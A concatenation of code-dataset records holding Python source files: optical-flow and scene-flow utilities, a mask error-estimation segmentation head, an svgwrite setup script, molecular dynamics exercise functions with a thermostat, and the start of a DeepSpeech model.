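# Zero flow should reproduce the input image.
img = torch.rand(1, 3, 8, 8)
assert torch.allclose(warp_with_flow(img, torch.zeros(1, 2, 8, 8)), img, atol=1e-5)
```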
coords_from_optical_flow(tgt_optflow)\n return warp_from_coords(ctx_rgb, coords, mode='bilinear', padding_mode='zeros')\n\n\ndef reverse_optflow(tgt_optflow, ctx_optflow):\n \"\"\"Reverse optical flow for forward/backward consistency\"\"\"\n if is_list(tgt_optflow) and is_list(ctx_optflow):\n return [reverse_optflow(tgt_optflow[i], ctx_optflow[i]) for i in range(len(tgt_optflow))]\n return - warp_from_optflow(tgt_optflow, ctx_optflow)\n\n\ndef mask_from_coords(coords):\n \"\"\"Get mask from warped coordinates\"\"\"\n if is_list(coords):\n return [mask_from_coords(coord) for coord in coords]\n b, _, h, w = coords.shape\n mask = torch.ones((b, 1, h, w), dtype=torch.float32, device=coords.device, requires_grad=False)\n mask = warp_from_coords(mask, coords, mode='nearest', padding_mode='zeros')\n return mask.bool()\n\n\ndef depth_from_optflow(rgb, intrinsics, pose_context, flows,\n residual=False, clip_range=None):\n \"\"\"\n Converts pose + intrinsics + optical flow -> depth estimations\n\n Parameters\n ----------\n rgb : torch.Tensor\n Base image [B,3,H,W]\n intrinsics : torch.Tensor\n Camera intrinsics [B,3,3]\n pose_context : torch.Tensor or list[torch.Tensor]\n List of relative context camera poses [B,4,4]\n flows : torch.Tensor or list[torch.Tensor]\n List of target optical flows [B,2,H,W]\n residual : bool\n Return residual error with depth\n clip_range : tuple\n Depth range clipping values\n\n Returns\n -------\n depth : torch.Tensor\n Estimate depth map [B,1,H,W]\n \"\"\"\n # Make lists if necessary\n flows = make_list(flows)\n if is_list(flows[0]):\n return [depth_from_optflow(rgb[i], intrinsics, pose_context, flows[i], residual, clip_range)\n for i in range(len(flows))]\n pose_context = make_list(pose_context)\n # Extract rotations and translations\n rotations = [p[:, :3, :3] for p in pose_context]\n translations = [p[:, :3, -1] for p in pose_context]\n # Get bearings\n bearings = bearing_grid(rgb, intrinsics).to(rgb.device)\n rot_bearings = [mult_rotation_bearing(rotation, bearings)\n for rotation in rotations]\n # Return triangulation results\n return triangulation(rot_bearings, translations, flows, intrinsics,\n clip_range=clip_range, residual=residual)\n\n\ndef scene_flow_from_depth_optflow(depth1, depth2, cam1, cam2, optflow12, optflow21):\n \"\"\"Get scene flow from depth and optical flow\"\"\"\n # Reconstruct points from depth and camera\n pts1 = cam1.reconstruct_depth_map(depth1, to_world=False)\n pts2 = cam2.reconstruct_depth_map(depth2, to_world=False)\n # Get warping coordinates from optical flow\n coords12 = coords_from_optical_flow(optflow12)\n coords21 = coords_from_optical_flow(optflow21)\n # Warp points based on coordinates\n warp12 = warp_from_coords(pts1, coords12)\n warp21 = warp_from_coords(pts2, coords21)\n # Get scene flow as the difference between warped and original points\n scnflow12 = warp12 - pts2\n scnflow21 = warp21 - pts1\n # Return scene flow\n return scnflow12, scnflow21\n\n\ndef residual_scene_flow_from_depth_optflow(depth1, depth2, cam1, cam2, optflow12, optflow21):\n \"\"\"Get residual scene flow from depth and optical flow\"\"\"\n # Calculate scene flow\n scnflow21, scnflow12 = scene_flow_from_depth_optflow(depth1, depth2, cam1, cam2, optflow12, optflow21)\n # Calculate residual scene flow\n res_scnflow12 = residual_scene_flow(depth1, scnflow12, cam1.relative_to(cam2))\n res_scnflow21 = residual_scene_flow(depth2, scnflow21, cam2.relative_to(cam1))\n # Return residual scene flow\n return res_scnflow21, res_scnflow12\n\n\ndef 
residual_scene_flow(depth, scene_flow, cam_rel):\n \"\"\"Get residual scene flow from depth, motion, and scene flow\"\"\"\n # If depth and scene flow are lists, return residual for each one\n if is_list(depth) and is_list(scene_flow):\n return [residual_scene_flow(d, sf, cam_rel) for d, sf in zip(depth, scene_flow)]\n pts_scn = cam_rel.reconstruct_depth_map(depth, scene_flow=scene_flow, to_world=False)\n pts_mot = cam_rel.reconstruct_depth_map(depth, to_world=True)\n return pts_scn - pts_mot\n\n\ndef to_world_scene_flow(cam, depth, scene_flow):\n \"\"\"Convert scene flow to world coordinates\"\"\"\n pts = cam.reconstruct_depth_map(depth, to_world=True)\n pts_scnflow = cam.reconstruct_depth_map(depth, scene_flow=scene_flow, to_world=True)\n return pts_scnflow - pts\n\n\ndef fwd_bwd_optflow_consistency_check(fwd_flow, bwd_flow, alpha=0.1, beta=0.5):\n \"\"\"Forward/backward consistency check for optical flow, to produce occlusion masks\"\"\"\n if is_list(fwd_flow) and is_list(bwd_flow):\n fwd_bwd = [fwd_bwd_optflow_consistency_check(fwd_flow[i], bwd_flow[i], alpha, beta)\n for i in range(len(fwd_flow))]\n return [fb[0] for fb in fwd_bwd], [fb[1] for fb in fwd_bwd]\n\n flow_mag = torch.norm(fwd_flow, dim=1) + torch.norm(bwd_flow, dim=1)\n\n warped_bwd_flow = warp_from_optflow(bwd_flow, fwd_flow)\n warped_fwd_flow = warp_from_optflow(fwd_flow, bwd_flow)\n\n diff_fwd = torch.norm(fwd_flow + warped_bwd_flow, dim=1)\n diff_bwd = torch.norm(bwd_flow + warped_fwd_flow, dim=1)\n\n threshold = alpha * flow_mag + beta\n\n fwd_occ = (diff_fwd < threshold).unsqueeze(1)\n bwd_occ = (diff_bwd < threshold).unsqueeze(1)\n\n return fwd_occ, bwd_occ\n\n\ndef warp_optflow_dict(rgb, optflow, valid=None, keys=None):\n \"\"\"Warp RGB images based on optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n warps = {}\n for tgt in keys:\n update_dict(warps, tgt)\n for ctx in keys[tgt]:\n warps[tgt][ctx] = warp_from_optflow(rgb[ctx], optflow[tgt][ctx])\n if valid is not None:\n warps[tgt][ctx] *= valid[tgt][ctx]\n return warps\n\n\ndef warp_motion_dict(rgb, depth, cams, scnflow=None, world_scnflow=None, valid=None, keys=None):\n \"\"\"Warp RGB images based on motion dictionary\"\"\"\n if keys is None and scnflow is not None:\n keys = {key: list(val.keys()) for key, val in scnflow.items()}\n if keys is None and world_scnflow is not None:\n keys = {key: list(val.keys()) for key, val in world_scnflow.items()}\n if keys is None and scnflow is None and world_scnflow is None:\n keys = {key: [k for k in cams.keys() if abs(k[0] - key[0]) == 1 and k[1] == key[1]] for key in cams.keys()}\n warps = {}\n for tgt in keys:\n update_dict(warps, tgt)\n for ctx in keys[tgt]:\n warps[tgt][ctx] = warp_from_motion(\n rgb[ctx], cams[ctx],\n depth[tgt][ctx] if is_dict(depth[tgt]) else depth[tgt], cams[tgt],\n tgt_scnflow=get_from_dict(scnflow, tgt, ctx),\n tgt_world_scnflow=get_from_dict(world_scnflow, tgt, ctx)\n )\n if valid is not None:\n warps[tgt][ctx] *= valid[tgt][ctx]\n return warps\n\n\ndef warped_depth_dict(depth, cams, scnflow=None, world_scnflow=None, valid=None, keys=None):\n \"\"\"Warp depth maps based on motion dictionary\"\"\"\n if keys is None and scnflow is not None:\n keys = {key: list(val.keys()) for key, val in scnflow.items()}\n if keys is None and world_scnflow is not None:\n keys = {key: list(val.keys()) for key, val in world_scnflow.items()}\n warps = {}\n for tgt in keys:\n update_dict(warps, tgt)\n for ctx in keys[tgt]:\n warps[tgt][ctx] = 
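fwd_bwd_optflow_consistency_check above thresholds |f + warp(b)| against alpha * (|f| + |b|) + beta; note the returned masks are True where the flows agree, despite the `_occ` naming. The threshold logic with the warping step factored out:

```python
import torch

def consistency_mask(fwd: torch.Tensor, bwd_warped: torch.Tensor,
                     alpha: float = 0.1, beta: float = 0.5) -> torch.Tensor:
    """True where forward flow and the (already warped) backward flow
    roughly cancel, mirroring the check above."""
    mag = torch.norm(fwd, dim=1) + torch.norm(bwd_warped, dim=1)
    diff = torch.norm(fwd + bwd_warped, dim=1)
    return (diff < alpha * mag + beta).unsqueeze(1)

f = torch.full((1, 2, 4, 4), 2.0)
assert consistency_mask(f, -f).all()     # perfectly consistent flows
assert not consistency_mask(f, f).any()  # grossly inconsistent flows
```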
warp_depth_from_motion(\n depth[ctx], cams[ctx], depth[tgt], cams[tgt],\n tgt_scnflow=get_from_dict(scnflow, tgt, ctx),\n ctx_scnflow=get_from_dict(scnflow, ctx, tgt),\n tgt_world_scnflow=get_from_dict(world_scnflow, tgt, ctx),\n ctx_world_scnflow=get_from_dict(world_scnflow, ctx, tgt),\n )\n if valid is not None:\n warps[tgt][ctx] *= valid[tgt][ctx]\n return warps\n\n\ndef reverse_optflow_dict(optflow, valid=None, keys=None):\n \"\"\"Reverse optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n reverse = {}\n for tgt in keys:\n update_dict(reverse, tgt)\n for ctx in keys[tgt]:\n reverse[tgt][ctx] = reverse_optflow(optflow[ctx][tgt], optflow[tgt][ctx])\n if valid is not None:\n reverse[tgt][ctx] *= valid[tgt][ctx]\n return reverse\n\n\ndef optflow_from_motion_dict(depth, cams, scnflow=None, world_scnflow=None, valid=None, keys=None):\n \"\"\"Get opical flow from motion dictionary\"\"\"\n if keys is None and scnflow is not None:\n keys = {key: list(val.keys()) for key, val in scnflow.items()}\n if keys is None and world_scnflow is not None:\n keys = {key: list(val.keys()) for key, val in world_scnflow.items()}\n optflow = {}\n for tgt in keys:\n update_dict(optflow, tgt)\n for ctx in keys[tgt]:\n optflow[tgt][ctx] = optflow_from_motion(\n cams[ctx], depth[tgt], cams[tgt],\n tgt_scnflow=get_from_dict(scnflow, tgt, ctx),\n tgt_world_scnflow=get_from_dict(world_scnflow, tgt, ctx),\n )\n if valid is not None:\n optflow[tgt][ctx] *= valid[tgt][ctx]\n return optflow\n\n\ndef triangulated_depth_dict(optflow, cams, valid=None, keys=None):\n \"\"\"Triangulage depth maps from optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n depth = {}\n for tgt in keys:\n update_dict(depth, tgt)\n for ctx in keys[tgt]:\n depth[tgt][ctx] = depth_from_optflow(\n optflow[tgt][ctx], cams[ctx].K, cams[ctx].relative_to(cams[tgt]).Twc.T, [optflow[tgt][ctx]])\n if valid is not None:\n depth[tgt][ctx] *= valid[tgt][ctx]\n return depth\n\n\ndef scnflow_from_optflow_dict(optflow, depth, cams, keys=None, valid=None, to_world=True):\n \"\"\"Get scene flow from optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n scnflow = {}\n for tgt in keys:\n update_dict(scnflow, tgt)\n for ctx in keys[tgt]:\n if ctx not in scnflow.keys() or tgt not in scnflow[ctx]:\n update_dict(scnflow, ctx)\n scnflow[ctx][tgt], scnflow[tgt][ctx] = residual_scene_flow_from_depth_optflow(\n depth[tgt], depth[ctx], cams[tgt], cams[ctx], optflow[ctx][tgt], optflow[tgt][ctx])\n if to_world:\n scnflow[tgt][ctx] = to_world_scene_flow(cams[tgt], depth[tgt], scnflow[tgt][ctx])\n scnflow[ctx][tgt] = to_world_scene_flow(cams[ctx], depth[ctx], scnflow[ctx][tgt])\n if valid is not None:\n scnflow[tgt][ctx] *= valid[tgt][ctx]\n scnflow[ctx][tgt] *= valid[ctx][tgt]\n return scnflow\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/utils/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"32272202364","text":"import fvcore.nn.weight_init as weight_init\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport pycocotools.mask as mask_utils\n\nfrom mask_eee_rcnn.layers import Conv2d, ShapeSpec, cat, get_norm, ConvTranspose2d\nfrom mask_eee_rcnn.utils.events import get_event_storage\nfrom mask_eee_rcnn.utils.registry import 
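Every *_dict helper in flow.py above follows the same shape: derive a {target: [contexts]} key map, then fill a nested {tgt: {ctx: value}} table. The shared skeleton, with a generic pair function standing in for the warp / reverse / triangulate call:

```python
def pairwise_apply(fn, keys: dict) -> dict:
    """Build the nested {target: {context: value}} tables the *_dict
    helpers above all share, for an arbitrary pair function fn(tgt, ctx)."""
    out: dict = {}
    for tgt, ctxs in keys.items():
        out.setdefault(tgt, {})
        for ctx in ctxs:
            out[tgt][ctx] = fn(tgt, ctx)
    return out

table = pairwise_apply(lambda t, c: (t, c), {0: [-1, 1], 1: [0]})
assert table[0][1] == (0, 1) and table[1][0] == (1, 0)
```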
Registry\n\nROI_MASK_EEE_HEAD_REGISTRY = Registry(\"ROI_MASK_EEE_HEAD\")\nROI_MASK_EEE_HEAD_REGISTRY.__doc__ = \"\"\"\nRegistry for maskiou heads, which predicts predicted mask iou.\n\nThe registered object will be called with `obj(cfg, input_shape)`.\n\"\"\"\n\nfrom monai.losses import *\n\n\ndef mask_eee_loss(pred_mask_eee, true_positive_mask, true_negative_mask, false_positive_mask, false_negative_mask, loss_weight, loss_type):\n \"\"\"\n Compute the maskiou loss.\n\n Args:\n labels (Tensor): Given mask labels\n pred_maskiou: Predicted maskiou\n gt_maskiou: Ground Truth IOU generated in mask head\n \"\"\"\n\n gt_mask = torch.cat([\n true_positive_mask.unsqueeze(1),\n true_negative_mask.unsqueeze(1),\n false_positive_mask.unsqueeze(1),\n false_negative_mask.unsqueeze(1),\n ], dim=1).to(dtype=torch.float) # [N, 4, H, W]\n\n if loss_type == 'cross_entropy':\n gt_mask = torch.argmax(gt_mask, dim=1).to(dtype=torch.long) # [N, 4, H, W] = to [N, H, W]\n loss = F.cross_entropy(\n pred_mask_eee, \n gt_mask,\n reduction='mean')\n elif loss_type == 'dice' or loss_type == 'true_consistency_dice':\n criterion = DiceLoss(reduction='mean', softmax=True)\n loss = criterion(pred_mask_eee, gt_mask)\n elif loss_type == 'dice_focal':\n criterion = DiceFocalLoss(reduction='mean', softmax=True)\n loss = criterion(pred_mask_eee, gt_mask)\n elif loss_type == 'dice_ce':\n criterion = DiceCELoss(reduction='mean', softmax=True)\n loss = criterion(pred_mask_eee, gt_mask)\n else:\n raise NotImplementedError\n \n # import cv2\n # import numpy as np\n # n_masks = pred_mask_eee.shape[0]\n # for idx in range(n_masks):\n # pred = pred_mask_eee[idx]\n # pred = torch.argmax(pred, dim=0, keepdim=True)\n # pred = torch.cat([pred == i for i in range(4)], dim=0) # ignore false negative\n # pred = pred.detach().cpu().numpy().astype(np.uint8) * 255\n # pred = pred.transpose(1, 2, 0) # [3, H, W] -> [H, W, 3]\n # pred_vis = np.zeros([pred.shape[0], pred.shape[1], 3])\n # pred_vis[:, :, 0] = pred[:, :, 1]\n # pred_vis[:, :, 1] = pred[:, :, 0]\n # pred_vis[:, :, 2] = pred[:, :, 2]\n # gt_vis = np.zeros([pred.shape[0], pred.shape[1], 3])\n # tp_mask = true_positive_mask[idx].unsqueeze(0).detach().cpu().numpy()\n # tp_mask = (tp_mask * 255).astype(np.uint8).transpose(1, 2, 0)\n # tn_mask = true_negative_mask[idx].unsqueeze(0).detach().cpu().numpy()\n # tn_mask = (tn_mask * 255).astype(np.uint8).transpose(1, 2, 0)\n # fp_mask = false_positive_mask[idx].unsqueeze(0).detach().cpu().numpy()\n # fp_mask = (fp_mask * 255).astype(np.uint8).transpose(1, 2, 0)\n # gt_vis[:, :, 0] = tn_mask[:, :, 0]\n # gt_vis[:, :, 1] = tp_mask[:, :, 0]\n # gt_vis[:, :, 2] = fp_mask[:, :, 0]\n # cv2.imwrite('mask_{}.png'.format(idx), np.hstack([pred_vis, gt_vis]))\n\n return {'loss_mask_eee': loss * loss_weight } \n\n\ndef mask_eee_inference(pred_instances, pred_mask_eee):\n\n # pred_mask = [N, 1, H, W]\n\n # argmax version\n # pred_mask = torch.argmax(pred_mask_eee, dim=1, keepdim=True) # [N, 1, H, W]\n # pred_mask = torch.cat([pred_mask == i for i in range(4)], dim=1)[:, :3, :, :] \n\n # softmax version\n pred_mask = torch.softmax(pred_mask_eee, dim=1)\n\n\n # ignore false negative\n num_boxes_per_image = [len(i) for i in pred_instances]\n pred_mask = pred_mask.split(num_boxes_per_image, dim=0)\n for pred_errors, instance in zip(pred_mask, pred_instances):\n instance.set('pred_error', pred_errors)\n initial_masks = instance.get('pred_masks') # [N, H, W]\n n_mask = initial_masks.shape[0]\n\n # refine mask\n refined_masks = []\n for idx in range(n_mask):\n 
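mask_eee_loss above stacks four ground-truth error masks into a [N, 4, H, W] target. Those channels come from comparing a binary prediction against ground truth; a sketch of that decomposition (the upstream code that produces the masks is not part of this file):

```python
import torch

def error_decomposition(pred: torch.Tensor, gt: torch.Tensor) -> torch.Tensor:
    """Stack {0,1} masks [N,H,W] into the [TP, TN, FP, FN] channel order
    used for gt_mask in mask_eee_loss above."""
    tp = pred * gt
    tn = (1 - pred) * (1 - gt)
    fp = pred * (1 - gt)
    fn = (1 - pred) * gt
    return torch.stack((tp, tn, fp, fn), dim=1).float()  # [N,4,H,W]

pred = torch.tensor([[[1, 0], [1, 0]]])
gt = torch.tensor([[[1, 1], [0, 0]]])
m = error_decomposition(pred, gt)
assert m.sum(dim=1).eq(1).all()  # the four channels partition every pixel
# mask_eee_inference later recombines channels 0 and 2 (TP + FP) as the
# refined foreground, so a perfect error prediction reproduces the mask:
assert torch.equal(m[:, 0] + m[:, 2], pred.float())
```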
initial_mask = initial_masks[idx] # [1, H, W]\n pred_error = pred_errors[idx] # [4, H, W]\n # filter_mask = (initial_mask > 0.5).to(dtype=torch.float) # [1, H, W]\n true_positive_mask = pred_error[0:1, :, :] \n true_negative_mask = pred_error[1:2, :, :] \n false_positive_mask = pred_error[2:3, :, :] \n # false_negative_mask = pred_error[3, :, :] * (1 - filter_mask) # [H, W]\n refined_mask = true_positive_mask + false_positive_mask\n # normalize to 0 ~ 1\n # refined_mask = (refined_mask - refined_mask.min()) / (refined_mask.max() - refined_mask.min())\n refined_masks.append(refined_mask)\n instance.pred_masks = torch.stack(refined_masks, dim=0) # [N, H, W]\n\n\n # import numpy as np\n # import cv2\n # for idx in range(n_mask):\n # initial_m = initial_masks[idx].detach().cpu().numpy() # [1, H, W]\n # initial_m = initial_m.transpose(1, 2, 0) * 255\n # initial_m = initial_m.astype(np.uint8)\n # initial_m = np.concatenate([initial_m, initial_m, initial_m], axis=2)\n # initia_m_binary = (initial_m > 127).astype(np.uint8) * 255\n # pred_m = pred_errors[idx][:3, :, :].detach().cpu().numpy().transpose(1, 2, 0) # [3, H, W] # 0: tp, 1: tn, 2: fp\n # pred_m = pred_m * 255\n # pred_m = pred_m.astype(np.uint8)\n # error_m = np.zeros([pred_m.shape[0], pred_m.shape[1], 3], dtype=np.uint8)\n # error_m[:, :, 0] = pred_m[:, :, 1] \n # error_m[:, :, 1] = pred_m[:, :, 0] \n # error_m[:, :, 2] = pred_m[:, :, 2] \n\n # refined_m = refined_masks[idx].detach().cpu().numpy() # [1, H, W]\n # refined_m = refined_m.transpose(1, 2, 0) * 255\n # refined_m = refined_m.astype(np.uint8)\n # refined_m = np.concatenate([refined_m, refined_m, refined_m], axis=2)\n # cv2.imwrite('vis/pred_error_{}.png'.format(idx), \\\n # np.vstack([\n # np.hstack([initial_m, initia_m_binary]),\n # np.hstack([error_m, refined_m])\n # ]))\n\n\n \n\n\n\n@ROI_MASK_EEE_HEAD_REGISTRY.register()\nclass MaskEEEHead(nn.Module):\n def __init__(self, cfg):\n super(MaskEEEHead, self).__init__()\n\n input_channels = 257\n conv_dims = cfg.MODEL.ROI_MASK_EEE_HEAD.CONV_DIM\n num_conv = cfg.MODEL.ROI_MASK_EEE_HEAD.NUM_CONV\n\n self.pooler_resolution = cfg.MODEL.ROI_MASK_EEE_HEAD.POOLER_RESOLUTION\n self.norm = cfg.MODEL.ROI_MASK_EEE_HEAD.NORM\n\n self.conv_norm_relus = []\n for k in range(num_conv):\n conv = Conv2d(\n input_channels if k == 0 else conv_dims,\n conv_dims,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=not self.norm,\n norm=get_norm(self.norm, conv_dims),\n activation=F.relu,\n )\n self.add_module(\"mask_eee_fcn{}\".format(k + 1), conv)\n self.conv_norm_relus.append(conv)\n\n if self.pooler_resolution == 14:\n self.deconv = ConvTranspose2d(\n conv_dims if num_conv > 0 else input_channels,\n conv_dims,\n kernel_size=2,\n stride=2,\n padding=0,\n )\n self.add_module(\"mask_eee_deconv\", self.deconv)\n\n\n self.predictor = Conv2d(\n conv_dims,\n 4,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n self.add_module(\"mask_eee_predictor\", self.predictor)\n\n # init weights\n for layer in self.conv_norm_relus:\n weight_init.c2_msra_fill(layer)\n nn.init.normal_(self.predictor.weight, std=0.001)\n if self.predictor.bias is not None:\n nn.init.constant_(self.predictor.bias, 0)\n if self.pooler_resolution == 14:\n for layer in [self.deconv]:\n weight_init.c2_msra_fill(layer)\n\n def forward(self, x, mask):\n if self.pooler_resolution == 14:\n mask = F.max_pool2d(mask, kernel_size=2, stride=2)\n x = torch.cat((x, mask), 1)\n for layer in self.conv_norm_relus:\n x = layer(x)\n if self.pooler_resolution == 14:\n x = self.deconv(x)\n return 
self.predictor(F.relu(x))\n\n\ndef build_mask_eee_head(cfg):\n    \"\"\"\n    Build a mask eee head defined by `cfg.MODEL.ROI_MASK_EEE_HEAD.NAME`.\n    \"\"\"\n    name = cfg.MODEL.ROI_MASK_EEE_HEAD.NAME\n    return ROI_MASK_EEE_HEAD_REGISTRY.get(name)(cfg)\n","repo_name":"SeungBack/eee-for-inst-seg","sub_path":"mask_eee_rcnn/modeling/roi_heads/mask_eee_head.py","file_name":"mask_eee_head.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19127568475","text":"import os\nfrom distutils.core import setup\n\nfrom svgwrite import VERSION, AUTHOR_NAME, AUTHOR_EMAIL\n\ndef read(fname):\n    try:\n        return open(os.path.join(os.path.dirname(__file__), fname)).read()\n    except IOError:\n        return \"File '%s' not found.\\n\" % fname\n\nsetup(name='svgwrite',\n    version=VERSION,\n    description='A Python library to create SVG drawings.',\n    author=AUTHOR_NAME,\n    url='http://bitbucket.org/mozman/svgwrite',\n    download_url='http://bitbucket.org/mozman/svgwrite/downloads',\n    author_email=AUTHOR_EMAIL,\n    packages=['svgwrite', 'svgwrite/data'],\n    provides=['svgwrite'],\n    long_description=read('README.TXT')+read('NEWS.TXT'),\n    platforms=\"OS Independent\",\n    license=\"GPLv3\",\n    classifiers=[\n    \"Development Status :: 5 - Production/Stable\",\n    \"License :: OSI Approved :: GNU General Public License (GPL)\",\n    \"Operating System :: OS Independent\",\n    \"Programming Language :: Python :: 2.7\",\n    \"Programming Language :: Python :: 3\",\n    \"Programming Language :: Python :: 3.2\",\n    \"Programming Language :: Python :: Implementation :: CPython\",\n    \"Programming Language :: Python :: Implementation :: PyPy\",\n    \"Intended Audience :: Developers\",\n\t\"Topic :: Multimedia :: Graphics\",\n    \"Topic :: Software Development :: Libraries :: Python Modules\",\n    ]\n    )\n","repo_name":"charlesmchen/typefacet","sub_path":"dependencies/svgwrite/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"31"} +{"seq_id":"44827293164","text":"import numpy as np\nfrom tqdm import tqdm_notebook as tqdm_cs\n\ndef Force_LennardJones(d,r_m,epsilon):\n    ### Return the magnitude of the Lennard-Jones force\n    return 12 * epsilon * ( (r_m/d)**12 - (r_m/d)**6 ) / d\n\ndef Force_Harmonique(d,r_m,k):\n    ### Return the magnitude of the harmonic force\n    return - 2*k * (d - r_m)\n\ndef get_LJ_forces(positions,r_m,epsilon):\n    Npart,_ = positions.shape\n    forces = np.zeros(positions.shape)\n    energy = 0.0\n    r_m6 = r_m**6\n    r_m12 = r_m**12\n    factor = -12*epsilon\n    \n    dirVec = np.zeros((int(Npart*(Npart+1)/2-Npart),3))\n    stride = np.cumsum([0]+[it for it in range(Npart-1,0,-1)])\n    iparts = range(len(stride[:-1]))\n    for ipart, st, nd in zip(iparts, stride[:-1], stride[1:]):\n        dirVec[st:nd,:] = positions[ipart+1:] - positions[ipart]\n    \n    d2 = np.power(dirVec,2).sum(axis=1)\n    c2 = np.power(d2,-1)\n    c6 = r_m6*np.power(c2,3)\n    c12 = np.power(c6,2)\n    energy = epsilon * (c12 - 2*c6).sum()\n    fs = (factor*(c12-c6)*c2 ).reshape((-1,1))* dirVec\n    \n    for ipart, st, nd in zip(iparts, stride[:-1], stride[1:]):\n        forces[ipart] += fs[st:nd].sum(axis=0)\n        forces[ipart+1:] -= fs[st:nd]\n    return forces,energy\ndef get_Harm_forces(positions,r_m,k_spring):\n    Npart,_ = positions.shape\n    forces = np.zeros(positions.shape)\n    energy = 0.0\n    r = np.subtract(positions[1:], positions[:-1])\n    d = np.linalg.norm(r,axis=1)\n    dx = np.subtract(d,r_m)\n    \n    f = - 2 * k_spring * 
np.divide(dx,d).reshape((-1,1))\n rf = np.multiply(r, f)\n \n forces[:Npart-1] -= rf\n forces[1:] += rf\n energy = k_spring * np.power(dx,2).sum()\n return forces,energy\ndef get_forces(positions,r_m,epsilon,k_spring):\n LJ_forces,LJ_pot = get_LJ_forces(positions,r_m,epsilon)\n H_forces,H_pot = get_Harm_forces(positions,r_m,k_spring)\n return LJ_forces+H_forces,LJ_pot,H_pot\n\ndef calcule_forces(positions,r_m,epsilon,k_spring):\n LJ_forces,LJ_pot = get_LJ_forces(positions,r_m,epsilon)\n H_forces,H_pot = get_Harm_forces(positions,r_m,k_spring)\n return LJ_forces+H_forces\n\ndef andersen_thermostat(velocities,temperature,freq,dt):\n if temperature > 0:\n vshape = velocities.shape\n mask = np.random.rand(velocities.size) < 1 - np.exp(-freq*dt)\n Nupdate = np.sum(mask)\n velocities = velocities.flatten()\n velocities[mask] = np.sqrt(temperature)*np.random.normal(loc=0.0, scale=1,size=(Nupdate,))\n velocities = velocities.reshape(vshape)\n return velocities\n\n\ndef simulateur_NVT_efficace(positions,velocities,masse,temperature,r_m,epsilon,k_spring,Nstep,dt,enregistrement_stride=10):\n mass = masse\n Nparticule, _ = positions.shape\n accelerations = np.zeros(positions.shape)\n pos = []\n vel = []\n masses = np.ones((Nparticule))*mass\n thermostat_frequency = np.sqrt(2)*np.sqrt(2*k_spring)\n Nrecord = Nstep//enregistrement_stride \n diagnostic = dict(E_variation=np.zeros((Nrecord,)),Temperature=np.zeros((Nrecord,)),\n E_system=np.zeros((Nrecord,)),E_potentiel=np.zeros((Nrecord,)),\n E_cinetique=np.zeros((Nrecord,)),time=np.zeros((Nrecord,)))\n dt_half = 0.5*dt\n #th_en = 0.5*mass*np.power(velocities,2).sum()\n sys_en = 0\n econs = 0.0\n # Calculates the initial potential energy\n forces,ljpot,sppot = get_forces(positions,r_m,epsilon,k_spring)\n Ekin_tot = 0.5*mass*np.power(velocities,2).sum()\n sys_en += ljpot + sppot + Ekin_tot\n econs += sys_en \n ii = 0\n for it in tqdm_cs(range(Nstep)):\n \n #Apply thermostat\n econs += 0.5*mass*np.power(velocities,2).sum()\n velocities = andersen_thermostat(velocities,temperature,thermostat_frequency,dt)\n #CoM = np.average(velocities,weights=masses,axis=0).reshape((1,3))\n #velocities = velocities - CoM\n econs -= 0.5*mass*np.power(velocities,2).sum()\n \n # half update of velocities\n velocities = velocities + dt_half * accelerations\n # update of positions\n positions = positions + dt * velocities\n # update forces from new posittions\n forces,ljpot,sppot = get_forces(positions,r_m,epsilon,k_spring)\n # update acceleration\n accelerations = forces / mass\n # half update of velocities\n velocities = velocities + dt_half * accelerations\n \n Ekin_tot = 0.5*mass*np.power(velocities,2).sum()\n econs += ljpot + sppot + Ekin_tot - sys_en\n sys_en = ljpot + sppot + Ekin_tot\n \n if it % enregistrement_stride == 0:\n diagnostic['E_variation'][ii] = econs\n diagnostic['E_system'][ii] = sys_en\n diagnostic['E_cinetique'][ii] = Ekin_tot\n diagnostic['time'][ii] = it * dt\n diagnostic['Temperature'][ii] = Ekin_tot/1.5/len(positions)\n diagnostic['E_potentiel'][ii] = ljpot+sppot\n ii += 1\n \n vel.append(velocities)\n pos.append(positions)\n \n \n return pos,vel,diagnostic","repo_name":"lab-cosmo/marvel-college","sub_path":"MD/Exercise_functions.py","file_name":"Exercise_functions.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26076053757","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n# from config import *\n\nclass DeepSpeech(nn.Module):\n 
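simulateur_NVT_efficace above interleaves the Andersen thermostat with a velocity-Verlet update (half kick, drift, force refresh, second half kick). The integrator core in isolation, as a minimal sketch with a generic force callback:

```python
import numpy as np

def verlet_step(x, v, a, forces, mass, dt):
    """One velocity-Verlet update in the same half-kick / drift /
    half-kick order as the NVT loop above; `forces` maps positions
    to a force array of the same shape."""
    v = v + 0.5 * dt * a          # half kick with old accelerations
    x = x + dt * v                # drift
    a = forces(x) / mass          # refresh accelerations
    v = v + 0.5 * dt * a          # second half kick
    return x, v, a

# Free particles keep constant velocity under zero force.
x = np.zeros((4, 3)); v = np.ones((4, 3)); a = np.zeros((4, 3))
x, v, a = verlet_step(x, v, a, lambda p: np.zeros_like(p), 1.0, 0.01)
assert np.allclose(v, 1.0) and np.allclose(x, 0.01)
```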
